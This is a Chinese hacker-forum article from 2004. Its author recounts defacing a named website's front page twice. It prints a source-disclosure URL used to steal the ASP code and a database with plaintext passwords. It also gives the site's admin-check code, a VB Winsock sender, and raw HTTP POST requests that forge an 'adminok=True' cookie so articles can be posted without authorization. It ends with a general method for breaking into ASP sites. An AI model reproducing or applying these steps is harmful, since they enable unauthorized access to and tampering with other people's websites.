| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

我是怎么一天内两次改换黑白的首页更新的    热     ★★★ 【字体：小 大】
我是怎么一天内两次改换黑白的首页更新的
作者：SQL    文章来源：CnXHacker.Net    点击数：    更新时间：2004-10-31
黑白我可是天天都会去的，他的软件下载用的是CGI来实现的，而首页更新和文章浏览部分则用的是ASP做的，程序是从ASP动网先锋的那里搞来的原程序。ASP动网先锋他们那里的这套ASP管理程序目前在网上非常的流行，我已经看到好多地方用来做自己的软件和文章管理程序了，其实我也忍不住下了一套改了改打算以后自己用的：） 好了，既然有时间就又忍不住想看看他们放ASP程序的主机有什么漏洞没，用我的打碎南瓜一试和~ 马上就看到了原程序，地址： http://www.guanqian.com/null.htw?CiWebHitsFile=/starkun/article/articleconn.a sp%20&CiRestriction=none&CiHiliteType=Full 显示： 现在傻子也知道该怎么做了吧？把他们的数据库下来以后密码又是明文可见了，哎，想想自己那么努力建站可访问量又是不见起色，就忍不住偷偷在黑白的首页给自己做了广告厚着脸皮夸了自己那里一通（“不要脸，顿时西瓜皮从大家手中向我砸来”） 做完以后呢？当然是高高兴兴的上床睡我的大觉去了，现在北京好冷呀！被子里暖暖呼呼的感觉真好舒服：） 不过今天回来一看，呀！星坤已经把首页上我们的捣乱记录都删掉了（在此期间还有几个大站的站长和我一样厚着脸皮去人家那里给自己做广告去了，就不点名批评了：）。当然还是有点不甘心呀，毕竟我的宣传广告才放了一天不到耶：（ 怎么办？好再来试试看，可结果让人失望我用白鸽 打碎南瓜 twwwscan05 都没有看到新的服务器有什么可以看到ASP原码的漏洞，而星坤也已经把数据库的名字改掉了，看来真要没办法了？！？！ 快要放弃的时候想起来还可以再好好看看动网先锋那里的原程序，虽然数据库的路径有所改变但还应该有些地方可以利用的吧，果然看看下面的VB脚本的东西： if request.cookies("adminok")="" then response.redirect "login.asp" end if 在重要管理ASP的程序里都会有这样的简单的判断语句来看看我们是否有改动的权限，如果没有就回到login.asp，在chklogin.asp里有下面的内容： dim sql dim rs dim seekerrs dim founduser dim username dim companyid dim password dim errmsg dim founderr founderr=false FoundUser=false username=trim(request("username")) password=cstr(Request("password")) set rs=server.createobject("adodb.recordset") sql="select * from admin where id=1" rs.open sql,conn,1,1 if not(rs.bof and rs.eof) then if password=rs("password") and username=rs("username") then response.cookies("adminok")=true 看到没有这里就是我们要伪造的身份证明！ response.redirect "manage.asp" else response.write "" response.write "" response.write "Sorry,请输入正确的管理员名字和密码" end if end if rs.close conn.close set rs=nothing set conn=nothing 好象我们已经找到了突破口了，如果还不明白的话就和我一起用VB来编个简单的程序： Private Sub Command1_Click() Winsock1.Connect End Sub Private Sub Form_Load() Winsock1.Listen winsock1.localport=80 End Sub Private Sub Winsock1_Connect() Winsock1.SendData Text1.Text End Sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) If Winsock1.State <> sckClosed Then _ Winsock1.Close Winsock1.Accept requestID End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim strData As String Winsock1.GetData strData Text2.Text = strData End Sub 下面我们用他先来在本地监听自己的80端口，然后在本地用自己的下的动网先锋的ASP程序进入管理界面的添加文章的那部分（需要用PWS），然后马上关掉PWS运行我们的这个VB程序监听自己的80端口，当在IE里双击添加后程序收到如下东西： POST /a/savearticle.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/ vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* Referer: http://127.0.0.1/a/addarticle.asp?typeid="&typeid&" Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: 127.0.0.1 Content-Length: 58 Connection: Keep-Alive Cookie: adminok=True; ASPSESSIONIDFFFEUJRV=AIGBFGGDBOKEMGNDGNMCOKCH 看到没有adminok=True就是放在这里发个服务器来确定我们的身份的！下面是我们要添 加的文章数据： txttitle=%BB%B6%D3%AD%C0%B4%CE%D2%B5%C4%D1%AC%D2%C2%B2%DD%C0%D6%D4%B0%BF%B4% BF%B4%A3%BA%A3%A9&typeid=7&txtcontent=%B2%BB%BA%C3%D2%E2%CB%BC%A3%AC%D0%C7%C 0%A4%D0%D6%B5%DC%CE%D2%D4%D9%B4%CE%C4%C3%CF%C2%C1%CB%C4%E3%B5%C4ASP%B3%CC%D0 %F2%A3%AC%BA%C7%BA%C7%7E%7E%7E%0D%0A%B4%F3%BC%D2%B6%BC%C0%B4%CE%D2%C4%C7%C0%E F%C8%A5%BF%B4%BF%B4%B0%C9%21%CE%D2%BF%C9%CA%C7%D2%B2%BA%DC%C7%DA%B7%DC%B5%C4% D4%DA%C3%BF%C8%D5%B8%FC%D0%C2%B5%C4%D1%BD%A3%A1%0D%0A%0D%0Aminisql.yeah.net&c mdok=+%CC%ED+%BC%D3+ 好了现在我们只要改动以上数据里的几个地方，把它发到黑白的服务器上就可以了： POST http://www.guanqian.com.cn/starkun/article/savearticle.asp HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/ vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* Referer: http://www.guanqian.com.cn/starkun/article/addarticle.asp?typeid= "&typeid&" Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: www.guanqian.com.cn Content-Length: 479 Connection: Keep-Alive Cookie: adminok=True; ASPSESSIONIDFFFEUJRV=AIGBFGGDBOKEMGNDGNMCOKCH txttitle=%BB%B6%D3%AD%C0%B4%CE%D2%B5%C4%D1%AC%D2%C2%B2%DD%C0%D6%D4%B0%BF%B4 %BF%B4%A3%BA%A3%A9&typeid=7&txtcontent=%B2%BB%BA%C3%D2%E2%CB%BC%A3%AC%D0%C7 %C0%A4%D0%D6%B5%DC%CE%D2%D4%D9%B4%CE%C4%C3%CF%C2%C1%CB%C4%E3%B5%C4ASP%B3%CC %D0%F2%A3%AC%BA%C7%BA%C7%7E%7E%7E%0D%0A%B4%F3%BC%D2%B6%BC%C0%B4%CE%D2%C4%C7 %C0%EF%C8%A5%BF%B4%BF%B4%B0%C9%21%CE%D2%BF%C9%CA%C7%D2%B2%BA%DC%C7%DA%B7%DC %B5%C4%D4%DA%C3%BF%C8%D5%B8%FC%D0%C2%B5%C4%D1%BD%A3%A1%0D%0A%0D%0Aminisql.y eah.net&cmdok=+%CC%ED+%BC%D3+ 我们还用那个做好的VB程序来把这段代码发到对方服务器的80端口，显示结果为添加文章成功：）然后在去黑白的首页就又可以看到我厚着脸皮夸自己的文章了，西西系~~~当然我们还可以做任何星坤可以通过这个ASP程序来做的事情，包括来改密码：） 总结一下嘛就是对付ASP的方法： 1.先看看对方的服务器有无可以看到ASP原码的大漏洞，如果有直接去找他的数据库存放地址。 2.在网上找找对方用的ASP程序的代码，实际上好多网站都懒的自己开发ASP程序又不愿意去花 钱去买商业的ASP程序，往往都是从网上找些免费的改改后来用，经过往往都会留些漏洞被我们利用的。 最后还是那句话，如果你有什么不懂的或是让我去破什么聊天室 BBS的话还是算了，毕竟人家星坤可是很努力的在做网站没必要去做什么破坏的呀：）
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 浅谈sql注入式(SQL injection)攻击与防范 下一篇文章： 从web入侵到拿服务器控制权限
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				被病毒蹂躏得不能打开杀毒软 在教育网中怎么做到工作站网 services.exe怎么老100% 此进 岂能容忍“我是流氓我怕谁” 怎么写DOS病毒 看黑客怎么编写强力蓝屏炸弹 流氓软件是怎样炼成的 MSN怎么老犯晕？ 找回丢失的密码之遗忘了OE密 什么是DDOS攻击| 怎么抵抗DD

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.